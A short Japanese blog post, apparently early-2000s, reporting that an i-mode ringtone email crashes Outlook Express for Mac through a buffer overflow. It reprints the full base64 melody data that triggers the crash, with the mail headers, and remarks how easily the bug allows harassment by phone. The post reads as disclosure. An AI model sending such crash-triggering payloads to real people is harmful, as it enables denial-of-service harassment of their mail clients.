12/8の2. の続きなのですが。ほぼ私信状態です....
んー。しかPさん、はやーい。私が12/8の2. をアップしてから1時間ちょっとでもうpierre design bbsに書き込んでらっしゃる。しかもご自身のサイトも更新されてますね。
で、私もまるっきり同じ事考えましたね。> 1時間に1通
i-modeからだと身元バレちゃいますけど、昨今はそんな事気にしないデムパやらキチガイやら増えてますからね。i-modeから手軽に嫌がらせが出来るってなもんですね。i-modeは255文字までなので、eggはどうでしょう?とは思いますが。
で、自分の携帯が貧弱なもんで試験できなかったので、事務所の人に「手持ちの着メロ、バンバン俺に送ってみて」とお願いして送ってもらいました。ちなみに送ってもらった端末はSO503i 。で、以下の奴で見事に刺さりましたね。
〓
■ ■
〓 〓
〓 ばか殿〓
--B:M
bWVsbwAAARkAHQEBAXRpdGwAFINvg0qTYSiK8IK1gqKOnoLMibkpdHJhYwAAAPIA/8N4MCMXAKMXDGMXDCUXAKUXDGUXDCYXAKYXDGYXDCoXAKoXDGoXDCwXAKwXDG
wXDC8XAK8XDG8XDC9fALFfDHFfhCgLAFwLAKgLGCgLAFwLAKgLDCojAF4jAKojJCsLAF8LAKsLGCsLAF8LAKsLDC8jAGMjAK8jJCsXAF8XAKsXGCoLAF4LAKoLDCgX
AFwXAKgXSC8jAGMjAJAvJCsLAF8LGCoLAF4LAJALDC8jAGMjAJAvJCsLAF8LGCoLAF4LAJALDC8jAGMjAJAvJCsLAF8LGCoLAF4LAJALDCgXAFwXAJAXJCgXAFwXAJ
AXF//fAA==
で、Content-Typeなどはこんな感じでした。
------------------ RFC822 Header Follows ------------------
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit
X-UIDL: MMo"!cS[!!+8T!!PgW!!
-----------------------------------------------------------
しかしまぁ『ばか殿』で刺さっちゃうってのも何だか頭に来たりもしますが。ま、実際に刺せるという事で。
以上、Buffer over flow on OE for Mac with i-mode 着メロ編、でした。
あぁそれと。So-netと他どこか知りませんが。「これからに期待させて頂きます。」真面目な話で。ISPでFAQになっている様な事象が、実はセキュリティホールに絡んでるって事が他にも有るんじゃないかと憶測ながら思いますし。これから先にも何かきっと見付かるでしょうし。
まぁそろそろログも流れて無くなっちゃう頃ですけどね。もう8ページ目まで行ってますからねぇ。元発言が。< pierre design bbs
私的に手元でログの保全はしましたが。